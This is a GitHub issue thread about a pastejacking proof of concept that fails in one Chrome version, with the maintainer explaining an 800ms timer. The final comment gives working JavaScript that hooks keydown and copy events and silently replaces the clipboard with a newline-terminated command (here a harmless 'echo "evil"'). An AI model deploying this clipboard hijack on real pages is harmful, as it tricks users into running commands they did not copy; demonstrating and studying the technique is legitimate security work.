### ISSUE TITLE
Doesn't seem to work in Chrome

### ISSUE THREAD

**Issue by inputjoker** [dxa4481/Pastejacking#5]
This doesn't seem to work in Chrome Version 50.0.2661.86 (64-bit).

**Comment by inputjoker** [comment]
Works with ctrl+c ctrl+v in linux.

**Comment by dxa4481** [comment]
It works for me in version 50.0.2661.94. There is a 800ms timer that fires after the first keypress. If you do it to slow or too fast you may fall outside that timer. You can also try adjusting the timer in the source code to see if that helps. Is there any console output? That's all I can think of for why it may not work for you, let me know if you find out more details.

**Comment by inputjoker** [comment]
Still doesn't seem to work using mouse events. I made it work with the following

`var eventList = ['keydown','copy'];
            for(event of eventList) {
            document.addEventListener(event, function(event) {
                var ms = 800;  
                var start = new Date().getTime();
                var end = start;
                while(end < start + ms) {
                    end = new Date().getTime();
                } 
                copyTextToClipboard('echo "evil"\n');
            });
          }`
